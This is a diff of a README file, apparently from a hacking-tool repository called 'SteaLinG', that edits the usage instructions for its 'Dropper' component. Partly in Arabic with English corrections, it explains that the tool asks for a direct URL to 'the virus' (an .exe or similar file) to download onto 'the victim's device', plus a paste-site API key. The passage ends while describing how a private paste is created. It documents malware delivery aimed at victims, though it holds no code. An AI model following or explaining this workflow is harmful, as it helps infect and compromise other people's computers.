De3vil/SteaLinG/README.md

 | **2- Dropper**      |

+* تم التصحيح:

 * What requirements does he need from you?
-* And how does it work??
+* And how does it work?
-Requirements
+* Requirements:
-The first thing it asks you is the `URL` of the virus or whatever you want to download to the victim's device, but keep in mind that the `URL must be direct`, meaning that it must be the end
+The first thing he asks for is the URL of the virus or whatever you want to download onto the victim's device.
+Keep in mind that the URL must be direct, meaning that it must be the end of it.
+Its extension should be `.exe` or `.png`, or any other important extension.
+The important thing is that the `link` ends with a backslash `(/)`.
-Its Yama `.exe or .png, ` whatever is important is that it be a link that ends with a backstamp The second thing is to take the API Kay from you, and you will answer it as well.
-Either you register, click on the word API, you will find it, and you will take the username and password
+The second thing is to obtain the `API key `from you, which you will also provide.
+You can register and click on the `"API"` word to find it, and then take note of the `username` and `password`.
-So how does it work?
+* So, how does it work?
 ![](src/Untitled.png)

 The first thing is to create a paste on the site and make it private